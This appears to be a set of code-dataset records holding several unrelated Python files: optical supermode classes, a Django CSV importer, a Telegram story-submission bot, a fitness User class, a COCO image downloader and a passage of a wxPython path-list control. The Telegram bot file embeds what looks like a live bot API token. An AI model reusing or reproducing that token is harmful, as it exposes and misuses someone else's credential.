self.Plot('Fields', iter=n)\n\n\n def __copy__(self):\n to_be_copied = ['SuperModes']\n\n copy_ = SuperSet(self.NSolutions, self.Geometry)\n\n for attr in self.__dict__:\n\n if attr in to_be_copied:\n copy_.__dict__[attr] = cp.deepcopy( self.__dict__[attr] )\n else:\n copy_.__dict__[attr] = self.__dict__[attr]\n\n return copy_\n\n\n def Sort(self, parameter='Fields'):\n return SortSuperSet(self, parameter=parameter)\n\n\n\n\nclass ModeSlice(np.ndarray):\n\n def __new__(cls, Field, Axes, Index, Beta):\n self = Field.view(ModeSlice)\n\n return self\n\n\n def __init__(self, Field, Axes, Index, Beta):\n self.Field = Field\n self.Axes = Axes\n self.Index = Index\n self.Beta = Beta\n\n\n def __array_finalize__(self, viewed):\n pass\n\n\n def __pow__(self, other):\n assert isinstance(other, ModeSlice), f'Cannot multiply supermodes with {other.__class__}'\n\n overlap = np.abs( np.sum( np.multiply( self, other ) ) )\n\n return float( overlap )\n\n\n def Overlap(self, other):\n assert isinstance(other, ModeSlice), f'Cannot multiply supermodes with {other.__class__}'\n\n overlap = np.abs( np.sum( np.multiply( self, other ) ) )\n\n return float( overlap )\n\n\n def __plot__(self, ax, title=None):\n Field, xaxis, yaxis = RecomposeSymmetries(self, self.Axes)\n\n ax.pcolormesh(yaxis, xaxis, Field, shading='auto')\n\n ax.set_ylabel(r'Y-distance [$\\mu$m]', fontsize=6)\n\n ax.set_xlabel(r'X-distance [$\\mu$m]', fontsize=6)\n\n ax.set_aspect('equal')\n if title:\n ax.set_title(title, fontsize=8)\n\n\n def __copy__(self):\n to_be_copied = ['Field', 'Index', 'Axes', 'Beta']\n\n copy_ = ModeSlice(self, self.Axes, self.Index, self.Beta)\n\n for attr in self.__dict__:\n if attr in to_be_copied:\n\n copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n else:\n\n copy_.__dict__[attr] = self.__dict__[attr]\n\n return copy_\n\n\n\n def __deepcopy__(self, memo):\n to_be_copied = ['Field', 'Index', 'Axes', 'Beta']\n\n copy_ = ModeSlice(self, self.Axes, self.Index, self.Beta)\n\n for attr in self.__dict__:\n if attr in to_be_copied:\n\n copy_.__dict__[attr] = cp.copy(self.__dict__[attr])\n else:\n\n copy_.__dict__[attr] = self.__dict__[attr]\n\n return copy_\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# -\n","sub_path":"SuPyModes/SuperMode.py","file_name":"SuperMode.py","file_ext":"py","file_size_in_byte":7740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"529667702","text":"import sys, os\nimport csv\n\nimport numpy as np\nimport pandas as pd\n\n# csv.field_size_limit(sys.maxsize)\ncsv.field_size_limit(2147483647)\n\n# Full path and name to your csv file\ncsv_filepathname = \"test_users_10.csv\"\n# Full path to your django project directory\nyour_djangoproject_home = \"../\"\n\nsys.path.append(your_djangoproject_home)\nos.environ['DJANGO_SETTINGS_MODULE'] = 'airbnbNewUserPredictions.settings'\n\nfrom new_user.models import test_users\n# from new_user.models import train_users_2, countries\n# from predict_app.models import train_users_2, countries\n# from new_user.models import train_users_2, countries\n\n# dataframe = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\ndataframe = pd.read_csv(csv_filepathname)\n\nav = dataframe.age.values\ndataframe['age'] = np.where(np.logical_or(av < 14, av > 100), -1, av)\n\ndataframe = dataframe.fillna(-1)\ndataframe.to_csv(csv_filepathname, index=False)\ndataframe = csv.reader(open(csv_filepathname), delimiter=',', quotechar='\"')\n\ncount = 0\nfor row in dataframe:\n count += 1\n if row[0] != 'id': # Ignore the header row, import everything else\n print(count)\n test_user = test_users()\n test_user.id = row[0]\n test_user.date_account_created = row[1]\n test_user.timestamp_first_active = row[2]\n test_user.date_first_booking = row[3]\n test_user.gender = row[4]\n test_user.age = row[5]\n test_user.signup_method = row[6]\n test_user.signup_flow = row[7]\n test_user.language = row[8]\n test_user.affiliate_channel = row[9]\n test_user.affiliate_provider = row[10]\n test_user.first_affiliate_tracked = row[11]\n test_user.signup_app = row[12]\n test_user.first_device_type = row[13]\n test_user.first_browser = row[14]\n test_user.save()\n","sub_path":"data/load_test_users.py","file_name":"load_test_users.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"403873528","text":"# -*- coding: utf-8 -*-\r\nimport telebot\r\nfrom telebot import types\r\n\r\ntoken = \"463092885:AAGhAgYvWqF0tjTKCa6m-0AsYpCsetSmYtQ\"\r\nwelcome = \"Введите свою историю.\\nВ течении суток она будет прочитана модераторами и опубликована на канале.\"\r\nadmin_id = \"211439710\" #304123334\r\n\r\nbot = telebot.TeleBot(token)\r\n\r\n\r\n# Обработка /start команды - выдача клавиатуры\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n bot.send_message(message.chat.id, welcome)\r\n\r\n\r\n@bot.message_handler(content_types=[\"text\"])\r\ndef repeat(message):\r\n keyboard = types.InlineKeyboardMarkup()\r\n keyboard.add(*[types.InlineKeyboardButton(text=name, callback_data=name) for name in ['Хотите ввести еще одну историю?']])\r\n bot.send_message(admin_id, 'Новое сообщение:\\n' + message.text + '\\n\\nАвтор письма: @' +\r\n message.from_user.username, parse_mode='HTML')\r\n bot.send_message(message.chat.id, 'Спасибо большое, Ваше сообщение отправлено.', reply_markup=keyboard)\r\n\r\n\r\n@bot.callback_query_handler(func=lambda c: True)\r\ndef inline(c):\r\n if c.data == 'Хотите ввести еще одну историю?':\r\n bot.edit_message_text(chat_id=c.message.chat.id, message_id=c.message.message_id,\r\n text='Напиши свою историю', parse_mode='HTML')\r\n\r\n\r\nbot.polling(none_stop=True)\r\n","sub_path":"bot3.py","file_name":"bot3.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"3245682","text":"#!/usr/bin/env python3\nfrom Scripts.exercise import Exercise\nfrom Scripts.userexercise import UserExercise\nfrom Scripts.fitnesstest import FitnessTest\nfrom Scripts.workout import Workout # added by Larissa\nimport requests\n\nclass User:\n def __init__(self, ID, name, tracked, untracked, goals, \\\n themes, competition, inProgressWorkouts, savedWorkouts):\n self.name = name\n self.tracked = tracked\n self.untracked = untracked\n self.goals = goals\n self.themes = themes\n self.competition = competition\n\n # added by Larissa\n # stores current and incomplete workouts\n self.inProgressWorkouts = inProgressWorkouts # key: workoutID, value: workout class instance\n # stores saved workouts, if a user wants to do the workout again\n self.savedWorkouts = savedWorkouts # key: workoutID, value: workout class instance\n\n def __repr__(self):\n string = \"User: %s\\n***\\nTracked:\" % self.name\n for ex in self.tracked:\n string += \"\\n%s\" % str(ex)\n string += \"\\n***\\nUntracked:\"\n for ex in self.untracked:\n string += \"\\n%s\" % str(ex)\n string += \"\\n***\"\n return string\n\n def exIndexTracked(self, name):\n count = 0\n for uex in self.tracked:\n if uex.exercise.name == name:\n return count\n count += 1\n return None\n\n def exIndexUntracked(self, name):\n count = 0\n for uex in self.untracked:\n if uex.exercise.name == name:\n return count\n count += 1\n return None\n\n def hasEx(self, name):\n return self.exIndexTracked(name) is not None \\\n or self.exIndexUntracked(name) is not None\n\n def trackEx(self, userexercise):\n \"\"\"\n checks if the user is already tracking the exercise. If so,\n it adds the new info. If not, it adds it to tracked exercises.\n If it's in the untracked exercises, it moves the untracked\n exercise with the same name to tracked exercises.\n \"\"\"\n exname = userexercise.exercise.name\n idx = self.exIndexTracked(exname)\n if idx is not None:\n self.tracked[idx].combine(userexercise)\n elif self.exIndexUntracked(exname) is None:\n self.tracked.append(userexercise)\n else:\n idx = self.exIndexUntracked(exname)\n uex = self.untracked[idx]\n del self.untracked[idx]\n uex.combine(userexercise)\n self.tracked.append(uex)\n\n def untrackEx(self, name):\n \"\"\"\n moves the UserExercise by the given name from tracked to auntracked\n \"\"\"\n idx = self.exIndexTracked(name)\n assert idx is not None\n uex = self.tracked[idx]\n del self.tracked[idx]\n self.untracked.append(uex)\n\n def testFitness(self, category, numExercises):\n test = FitnessTest(category, numExercises)\n\n # added by Larissa\n def getWorkout(self, duration, difficulty, categories = None, muscleGroups = None):\n \"\"\"\n User either inputs a list of categories or a list of muscle groups\n Returns a workout based in the user's inputs\n\n Note: checking that duration, difficulty, and categories\n or muscleGroups are non-empty done by the app\n (if user does not input manually, pull from user profile)\n \"\"\"\n new = Workout(categories, muscleGroups, duration, difficulty)\n new.generateWorkout()\n return new\n\n def startWorkout(self, workout):\n id = workout.getID()\n\n if id not in self.inProgressWorkouts:\n self.inProgressWorkouts[id] = workout\n return True\n\n return False\n\n def startSavedWorkout(self, id):\n \"\"\"\n :param id: workout ID\n \"\"\"\n if id in self.savedWorkouts:\n # only update if not already an in progress version\n if id not in self.inProgressWorkouts:\n workout = self.savedWorkouts[id]\n self.inProgressWorkouts[id] = workout\n return True\n\n return False\n\n def quitWorkout(self, id):\n \"\"\"\n NOTE: can also be used when the user has completed\n a workout and does not want to save it\n :param id: workout ID\n \"\"\"\n if id in self.inProgressWorkouts:\n del self.inProgressWorkouts[id]\n return True\n\n return False\n\n def pauseWorkout(self, id, pausedOn):\n \"\"\"\n Updates in progress workout to the paused exercise\n Will start at this exercise when workout is resumed\n :param id: workout ID\n :param pausedOn: exercise where pause occurred\n\n Note: resume will be handled by the app\n \"\"\"\n if id in self.inProgressWorkouts:\n workout = self.inProgressWorkouts[id]\n workout.setCurrEx(pausedOn)\n self.inProgressWorkouts[id] = workout\n return True\n\n return False\n\n def saveWorkout(self, id):\n \"\"\"\n Upon completing a workout, user can save it\n :param id: workout ID\n \"\"\"\n if id in self.inProgressWorkouts and id not in self.savedWorkouts:\n toSave = self.inProgressWorkouts[id]\n toSave.setCurrEx(0) # roll back workout to beginning\n self.savedWorkouts[id] = toSave\n del self.inProgressWorkouts[id]\n return True\n\n return False\n\n def unsaveWorkout(self, id):\n if id in self.savedWorkouts:\n if id in self.inProgressWorkouts:\n del self.inProgressWorkouts[id]\n del self.savedWorkouts[id]\n return True\n\n return False\n\n def workoutsInProgress(self):\n \"\"\"\n Return all incomplete workouts so the app can load them for a user to see\n From there the user can resume a workout, which should start at the paused exercise\n \"\"\"\n return self.inProgressWorkouts\n\n def workoutsSaved(self):\n \"\"\"\n Return all saved workouts so the app can load them for a user to see\n From there the user can restart a workout, which should start at the first exercise\n Unless it is already in progress, in which case it starts at the proper exercise\n \"\"\"\n return self.savedWorkouts\n\nif __name__ == '__main__':\n user = User(\"Madeline\")\n print(user)\n","sub_path":"Scripts/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":6392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"215068788","text":"import json\nimport requests\ndef get_training_dataset():\n count = 0\n file_path_train = '/home/sh1v/Mini_Project/Yolo_CoCo_Dataset/custom_train2017_dataset_coco/'\n with open('annotations/instances_train2017_custom.json') as json_file:\n data = json.load(json_file)\n print(len(data['images']))\n for i in range(len(data['images'])):\n str = data['images'][i]['coco_url'].split('/')\n url = data['images'][i]['coco_url']\n r = requests.get(url, allow_redirects=True)\n open(file_path_train+str[-1], 'wb').write(r.content)\n file1 = open(\"gettrainvalno2017.txt\",\"a\")\n file1.write(file_path_train+str[-1]+'\\n')\n\ndef get_validation_dataset():\n count = 0\n file_path_val = '/home/sh1v/Mini_Project/Yolo_CoCo_Dataset/custom_val2017_dataset_coco/'\n with open('annotations/instances_val2017_custom.json') as json_file:\n data = json.load(json_file)\n print(\"Number of images: \",len(data['images']))\n for i in range(len(data['images'])):\n str = data['images'][i]['coco_url'].split('/')\n url = data['images'][i]['coco_url']\n r = requests.get(url, allow_redirects=True)\n open(file_path_val+str[-1],'wb').write(r.content)\n file2 = open(\"getvalidationno2017.txt\",\"a\")\n file2.write(file_path_val+str[-1]+'\\n')\n count += 1\n print(count)\nget_validation_dataset()\n","sub_path":"dataset/get_coco_custom_dataset.py","file_name":"get_coco_custom_dataset.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"402901178","text":"\"\"\"PathList - the PathListCtrl displays folders and paths in a scalable way\n\"\"\"\n\nimport bisect\nimport cellprofiler.gui\nimport cellprofiler.preferences\nimport logging\nimport numpy\nimport urllib\nimport urllib2\nimport uuid\nimport wx\nimport wx.lib.scrolledpanel\n\nlogger = logging.getLogger(__name__)\n\nOMERO_SCHEME = \"omero:\"\n\nEVT_PLC_SELECTION_CHANGED = wx.PyEventBinder(wx.NewEventType())\n\n\nclass PathListCtrl(wx.PyScrolledWindow):\n #\n # The width of the expander image (seems like all code samples have this\n # hardcoded)\n #\n TREEITEM_WIDTH = 16\n TREEITEM_HEIGHT = 16\n #\n # Gap between tree item and text\n #\n TREEITEM_GAP = 2\n\n class FolderItem(object):\n def __init__(self, ctrl, folder_name):\n self.folder_name = folder_name\n self.folder_display_name = PathListCtrl.get_folder_display_name(\n folder_name)\n self.display_width, _ = ctrl.GetTextExtent(self.folder_display_name)\n self.display_width += \\\n PathListCtrl.TREEITEM_WIDTH + PathListCtrl.TREEITEM_GAP\n self.widths = []\n self.filenames = []\n self.file_display_names = []\n self.enabled = []\n self.enabled_idxs = None\n self.opened = True\n\n def get_full_path(self, idx):\n \"\"\"Get the full pathname for the indexed file\"\"\"\n if self.folder_name.lower() == OMERO_SCHEME:\n return self.folder_name + self.filenames[idx]\n return self.folder_name + \"/\" + self.filenames[idx]\n\n def __init__(self, *args, **kwargs):\n super(self.__class__, self).__init__(*args, **kwargs)\n self.Font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)\n self.SetDoubleBuffered(True)\n self.selections = set()\n self.notify_selection_changed()\n self.folder_items = []\n self.folder_names = []\n self.folder_counts = numpy.zeros(0, int)\n self.folder_idxs = numpy.zeros(0, int)\n _, height = self.GetTextExtent(\"Wally\")\n self.line_height = height\n self.leading = 0\n self.show_disabled = True\n #\n # NB: NEVER USE MAGIC!!!!!\n #\n # If I use self.dirty or even self.__dirty, something down in the bowels\n # of wx (I suspect __setattr__) intercepts my attempt to set it\n # to True. So please keep the Yiddish below or use whatever substitute\n # you want.\n #\n # And if you ever, ever, ever think about hiding a variable by\n # overriding something like __setattr__, please think of the\n # consequences of your actions. In other words, NEVER USE MAGIC.\n #\n self.schmutzy = False\n self.mouse_down_idx = None\n self.mouse_idx = None\n self.focus_item = None\n self.fn_delete = None\n self.fn_context_menu = None\n self.fn_do_menu_command = None\n self.fn_folder_context_menu = None\n self.fn_do_folder_menu_command = None\n self.fn_empty_context_menu = None\n self.fn_do_empty_context_menu_command = None\n self.EnableScrolling(True, False)\n self.SetScrollRate(1, self.line_height + self.leading)\n self.Bind(wx.EVT_PAINT, self.on_paint)\n self.Bind(wx.EVT_RIGHT_DOWN, self.on_right_mouse_down)\n self.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)\n self.Bind(wx.EVT_LEFT_UP, self.on_mouse_up)\n self.Bind(wx.EVT_MOTION, self.on_mouse_moved)\n self.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.on_mouse_capture_lost)\n self.Bind(wx.EVT_SCROLLWIN, self.on_scroll_changed)\n self.Bind(wx.EVT_KEY_DOWN, self.on_key_down)\n self.Bind(wx.EVT_CONTEXT_MENU, self.on_context_menu)\n self.Bind(wx.EVT_SET_FOCUS, self.on_set_focus)\n self.Bind(wx.EVT_KILL_FOCUS, self.on_kill_focus)\n self.Bind(wx.EVT_LEFT_DCLICK, self.on_double_click)\n #\n # Compute the size of the message to display when empty\n #\n tmp = self.Font\n try:\n self.Font = self.DROP_FILES_AND_FOLDERS_FONT\n self.drop_files_and_folders_text_extent = \\\n self.GetTextExtent(self.DROP_FILES_AND_FOLDERS_HERE)\n except:\n logger.warn(\"Failed to get text extend for \\\"%s\\\" message\" %\n self.DROP_FILES_AND_FOLDERS_HERE, exc_info=True)\n self.drop_files_and_folders_text_extent = (200, 30)\n finally:\n self.Font = tmp\n\n def AcceptsFocus(self):\n \"\"\"Tell the scrollpanel that we can accept the focus\"\"\"\n return True\n\n def set_context_menu_fn(self,\n fn_context_menu,\n fn_folder_menu,\n fn_empty_menu,\n fn_do_menu_command,\n fn_do_folder_menu_command,\n fn_do_empty_command):\n \"\"\"Set the function to call to get context menu items\n\n fn_context_menu - a function that returns a list of menu items. The calling\n signature is fn_menu(paths) and the return is a sequence\n of two tuples of the form, (key, display_string).\n\n fn_folder_menu - a function that returns a list of menu items for\n a folder. The signature is fn_folder_menu(path).\n\n fn_empty_menu - a function that returns a list of menu items if\n nothing is selected\n\n fn_do_menu_command - a function that performs the action indicated\n by the command. It has the signature,\n fn_do_menu_command(paths, key) where \"key\" is the key from\n fn_context_menu.\n\n fn_do_folder_menu_command - a function that performs the action\n indicated by the folder command. The signature is\n fn_do_folder_menu_command(path, key)\n\n fn_do_empty_menu_command - a function that performs the command from\n the empty menu\n \"\"\"\n self.fn_context_menu = fn_context_menu\n self.fn_do_menu_command = fn_do_menu_command\n self.fn_folder_context_menu = fn_folder_menu\n self.fn_do_folder_menu_command = fn_do_folder_menu_command\n self.fn_empty_context_menu = fn_empty_menu\n self.fn_do_empty_context_menu_command = fn_do_empty_command\n\n def set_delete_fn(self, fn_delete):\n \"\"\"Set the function to call to delete items\n\n fn_delete - a function whose signature is fn_delete(paths)\n \"\"\"\n self.fn_delete = fn_delete\n\n def set_show_disabled(self, show):\n \"\"\"Show or hide disabled files\n\n show - true to show them, false to hide them\n \"\"\"\n if show == self.show_disabled:\n return\n self.show_disabled = show\n self.schmutzy = True\n self.selections = set()\n self.focus_item = None\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n\n def get_show_disabled(self):\n \"\"\"Return the state of the show / hide disabled flag\n\n returns True if we should show disabled files\n \"\"\"\n return self.show_disabled\n\n def get_path_count(self):\n \"\"\"# of paths shown in UI\"\"\"\n if self.schmutzy:\n self.recalc()\n return numpy.sum(self.folder_counts)\n\n def get_folder_count(self):\n \"\"\"# of folders shown in UI\"\"\"\n if self.schmutzy:\n self.recalc()\n self.schmutzy = False\n return len(self.folder_counts)\n\n def __len__(self):\n \"\"\"# of lines shown in UI\"\"\"\n return self.get_path_count() + self.get_folder_count()\n\n def __getitem__(self, idx):\n \"\"\"Return the folder and path at the index\n\n idx - index of item to retrieve\n \"\"\"\n if self.schmutzy:\n self.recalc()\n self.schmutzy = False\n folder_idx = bisect.bisect_right(self.folder_idxs, idx) - 1\n if idx == self.folder_idxs[folder_idx]:\n return self.folder_items[folder_idx], None\n item = self.folder_items[folder_idx]\n idx = idx - self.folder_idxs[folder_idx] - 1\n if idx >= self.folder_counts[folder_idx]:\n return None, None\n\n if self.show_disabled:\n return item, idx\n else:\n idx = item.enabled_idxs[idx]\n return item, idx\n\n @staticmethod\n def splitpath(path):\n slash = path.rfind(\"/\")\n if slash == -1:\n if path.lower().startswith(OMERO_SCHEME):\n return [path[:len(OMERO_SCHEME)], path[len(OMERO_SCHEME):]]\n return \"\", path\n else:\n return path[:slash], path[(slash + 1):]\n\n def add_paths(self, paths):\n \"\"\"Add the given URLs to the control\n\n paths - a sequence of URLs\n \"\"\"\n uid = uuid.uuid4()\n npaths = len(paths)\n for i, path in enumerate(paths):\n if i % 100 == 0:\n cellprofiler.preferences.report_progress(\n uid, float(i) / npaths,\n \"Loading %s into UI\" % path)\n folder, filename = self.splitpath(path)\n display_name = urllib2.url2pathname(filename)\n width, _ = self.GetTextExtent(display_name)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx >= len(self.folder_names) or self.folder_names[idx] != folder:\n folder_item = self.FolderItem(self, folder)\n self.folder_names.insert(idx, folder)\n self.folder_items.insert(idx, folder_item)\n else:\n folder_item = self.folder_items[idx]\n fp = folder_item.filenames\n pidx = bisect.bisect_left(fp, filename)\n if pidx >= len(fp) or fp[pidx] != filename:\n fp.insert(pidx, filename)\n folder_item.widths.insert(pidx, width)\n folder_item.file_display_names.insert(pidx, display_name)\n folder_item.enabled.insert(pidx, True)\n if len(paths) > 0:\n cellprofiler.preferences.report_progress(uid, 1, \"Done\")\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def enable_paths(self, paths, enabled):\n \"\"\"Mark a sequence of URLs as enabled or disabled\n\n Set the enabled/disabled flag for the given urls.\n\n paths - a sequence of URLs\n\n enabled - True to enable them, False to disable them.\n \"\"\"\n for path in paths:\n folder, filename = self.splitpath(path)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx >= len(self.folder_names) or self.folder_names[idx] != folder:\n continue\n folder_item = self.folder_items[idx]\n pidx = bisect.bisect_left(folder_item.filenames, filename)\n if (pidx >= len(folder_item.filenames) or\n folder_item.filenames[pidx] != filename):\n continue\n folder_item.enabled[pidx] = enabled\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def enable_all_paths(self):\n \"\"\"Mark all paths as enabled\n\n This puts the path list control in the appropriate state when\n filtering is disabled.\n \"\"\"\n for folder_item in self.folder_items:\n folder_item.enabled = [True] * len(folder_item.filenames)\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def expand_all(self, event=None):\n \"\"\"Expand all folders\"\"\"\n for folder_item in self.folder_items:\n folder_item.opened = True\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n def collapse_all(self, event=None):\n \"\"\"Collapse all folders\"\"\"\n for folder_item in self.folder_items:\n folder_item.opened = False\n self.schmutzy = True\n self.Refresh(eraseBackground=False)\n\n @staticmethod\n def get_folder_display_name(folder):\n \"\"\"Return a path name for a URL\n\n For files, the user expects to see a path, not a URL\n \"\"\"\n if folder.startswith(\"file:\"):\n return urllib.url2pathname(folder[5:]).decode(\"utf8\")\n return folder\n\n def recalc(self):\n \"\"\"Recalculate cached internals\n\n Call this before using any of the internals such as\n self.folder_idx\n \"\"\"\n if not self.schmutzy:\n return\n if len(self.folder_items) == 0:\n max_width, total_height = self.drop_files_and_folders_text_extent\n self.folder_counts = numpy.zeros(0, int)\n self.folder_idxs = numpy.zeros(0, int)\n else:\n if self.show_disabled:\n self.folder_counts = numpy.array(\n [len(x.filenames) if x.opened else 0\n for x in self.folder_items])\n else:\n for item in self.folder_items:\n enabled_mask = numpy.array(item.enabled, bool)\n item.enabled_idxs = numpy.arange(len(item.enabled))[enabled_mask]\n self.folder_counts = numpy.array(\n [numpy.sum(x.enabled) if x.opened else 0\n for x in self.folder_items])\n self.folder_idxs = numpy.hstack(([0], numpy.cumsum(self.folder_counts + 1)))\n max_width = reduce(max, [max(reduce(max, x.widths), x.display_width)\n for x in self.folder_items])\n total_height = self.line_height * self.folder_idxs[-1]\n total_height += self.leading * (self.folder_idxs[-1] - 1)\n self.max_width = max_width\n self.total_height = total_height\n self.schmutzy = False\n self.SetVirtualSize((max_width, total_height))\n\n def remove_paths(self, paths):\n \"\"\"Remove a sequence of URLs from the UI\"\"\"\n for path in paths:\n folder, filename = self.splitpath(path)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx < len(self.folder_names) and self.folder_names[idx] == folder:\n item = self.folder_items[idx]\n assert isinstance(item, self.FolderItem)\n fp = item.filenames\n pidx = bisect.bisect_left(fp, filename)\n if fp[pidx] == filename:\n del fp[pidx]\n del item.widths[pidx]\n del item.file_display_names[pidx]\n del item.enabled[pidx]\n if len(fp) == 0:\n del self.folder_names[idx]\n del self.folder_items[idx]\n self.selections = set() # indexes are all wrong now\n self.focus_item = None\n self.schmutzy = True\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n\n FLAG_ENABLED_ONLY = 1\n FLAG_SELECTED_ONLY = 2\n FLAG_FOLDERS = 4\n FLAG_RECURSE = 8\n FLAG_FOCUS_ITEM_ONLY = 16\n\n def get_paths(self, flags=0):\n \"\"\"Return paths\n\n flags - PathListCtrl.FLAG_ENABLED_ONLY to only return paths marked\n as enabled, PathListCtrl.FLAG_SELECTED_ONLY to return only\n selected paths, PathListCtrl.FLAG_FOCUS_ITEM_ONLY to return\n either an empty list or the focus item's path.\n \"\"\"\n paths = []\n if self.schmutzy:\n self.recalc()\n if flags & PathListCtrl.FLAG_FOCUS_ITEM_ONLY:\n def fn_iter():\n if self.focus_item is not None:\n yield self[self.focus_item]\n elif flags & PathListCtrl.FLAG_SELECTED_ONLY:\n def fn_iter():\n for idx in self.selections:\n yield self[idx]\n else:\n def fn_iter():\n for item in self.folder_items:\n for idx in range(len(item.filenames)):\n yield item, idx\n for item, idx in fn_iter():\n if idx is None:\n continue\n if flags & PathListCtrl.FLAG_ENABLED_ONLY:\n if not item.enabled[idx]:\n continue\n paths.append(item.get_full_path(idx))\n return paths\n\n def has_selections(self):\n \"\"\"Return True if there are any selected items\"\"\"\n return len(self.selections) > 0\n\n def clear_selections(self):\n self.selections = set()\n self.schmutzy = True\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n\n def SelectAll(self):\n \"\"\"Select all items in the control\"\"\"\n self.selections = set(range(len(self)))\n self.schmutzy = True\n self.notify_selection_changed()\n self.Refresh(eraseBackground=False)\n\n def select_path(self, url):\n \"\"\"Select the given URL if it is present in the list\n\n url - url to select if it is present\n\n returns True if the URL was selected\n \"\"\"\n folder, filename = self.splitpath(url)\n idx = bisect.bisect_left(self.folder_names, folder)\n if idx < len(self.folder_names) and self.folder_names[idx] == folder:\n folder_item = self.folder_items[idx]\n else:\n return False\n fp = folder_item.filenames\n pidx = bisect.bisect_left(fp, filename)\n if pidx >= len(fp) or fp[pidx] != filename:\n return False\n self.selections.add(self.folder_idxs[idx] + pidx + 1)\n self.notify_selection_changed()\n return True\n\n def notify_selection_changed(self):\n \"\"\"Publish a WX event that tells the world that the selection changed\"\"\"\n event = wx.NotifyEvent(EVT_PLC_SELECTION_CHANGED.evtType[0])\n event.EventObject = self\n self.GetEventHandler().ProcessEvent(event)\n\n def has_focus_item(self):\n \"\"\"Return True if an item is focused\"\"\"\n return self.focus_item is not None\n\n def get_folder(self, path, flags=0):\n \"\"\"Return the files or folders in the current folder.\n\n path - path to the folder\n flags - FLAG_ENABLED_ONLY to only return enabled files or folders\n with enabled files. FLAG_FOLDERS to return folders instead\n of files. FLAG_RECURSE to do all subfolders.\n \"\"\"\n idx = bisect.bisect_left(self.folder_names, path)\n folders = []\n recurse = (flags & self.FLAG_RECURSE) != 0\n wants_folders = (flags & self.FLAG_FOLDERS) != 0\n enabled_only = (flags & self.FLAG_ENABLED_ONLY) != 0\n has_path = (0 <= idx < len(self.folder_names) and path == self.folder_names[idx])\n if has_path:\n if not wants_folders:\n folders.append(self.folder_items[idx])\n idx += 1\n if recurse or wants_folders:\n for idx in range(idx, len(self.folder_items)):\n if not self.folder_names[idx].startswith(path):\n break\n rest = self.folder_names[idx][len(path)]\n if rest[0] != \"/\":\n continue\n rest = rest[1:]\n if (not recurse) and \"/\" in rest:\n continue\n folders.append(self.folder_items[idx])\n if wants_folders:\n return [x.folder_name for x in folders]\n else:\n result = []\n for item in folders:\n if enabled_only:\n result += [\n item.folder_name + \"/\" + item.filenames[e]\n for e in item.enabled_idxs]\n else:\n result += [item.folder_name + \"/\" + f\n for f in item.filenames]\n return result\n\n def on_scroll_changed(self, event):\n #\n # WX is buggy in the way it honors ScrolledWindow.EnableScrolling.\n # The arrow keys scroll the bitmap and the top line is scrolled down.\n #\n assert isinstance(event, wx.ScrollWinEvent)\n if event.GetOrientation() == wx.VERTICAL:\n width, _ = self.GetSizeTuple()\n r = wx.Rect(0, 0, width, (self.line_height + self.leading) * 2)\n self.Refresh(eraseBackground=False, rect=r)\n event.Skip(True)\n\n def on_set_focus(self, event):\n self.Refresh(eraseBackground=False)\n event.Skip(True)\n\n def on_kill_focus(self, event):\n self.Refresh(eraseBackground=False)\n event.Skip(True)\n\n DROP_FILES_AND_FOLDERS_HERE = \"Drop files and folders here\"\n __DROP_FILES_AND_FOLDERS_FONT = None\n\n @property\n def DROP_FILES_AND_FOLDERS_FONT(self):\n if self.__DROP_FILES_AND_FOLDERS_FONT is None:\n self.__DROP_FILES_AND_FOLDERS_FONT = wx.Font(\n 36, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL,\n wx.FONTWEIGHT_BOLD)\n return self.__DROP_FILES_AND_FOLDERS_FONT\n\n def show_idx_as_selected(self, idx):\n \"\"\"Return True if the indexed line should be shown selected\"\"\"\n if idx in self.selections:\n return True\n if self.mouse_down_idx is None:\n return False\n sel_start = min(self.mouse_down_idx, self.mouse_idx)\n sel_end = max(self.mouse_down_idx, self.mouse_idx) + 1\n return sel_start <= idx < sel_end\n\n def on_paint(self, event):\n \"\"\"Handle the paint event\"\"\"\n assert isinstance(event, wx.PaintEvent)\n paint_dc = wx.BufferedPaintDC(self)\n if self.schmutzy:\n self.recalc()\n width, height = self.GetSizeTuple()\n rn = wx.RendererNative.Get()\n paint_dc.BeginDrawing()\n background_color = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW)\n background_brush = wx.Brush(background_color)\n paint_dc.SetBrush(background_brush)\n paint_dc.Clear()\n paint_dc.SetFont(self.Font)\n paint_dc.SetBackgroundMode(wx.TRANSPARENT)\n has_focus = self.FindFocus() == self\n if has_focus:\n dir_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_HOTLIGHT)\n else:\n dir_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)\n\n enabled_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_WINDOWTEXT)\n disabled_color = wx.SystemSettings.GetColour(wx.SYS_COLOUR_GRAYTEXT)\n if len(self) == 0:\n text = self.DROP_FILES_AND_FOLDERS_HERE\n font = self.DROP_FILES_AND_FOLDERS_FONT\n 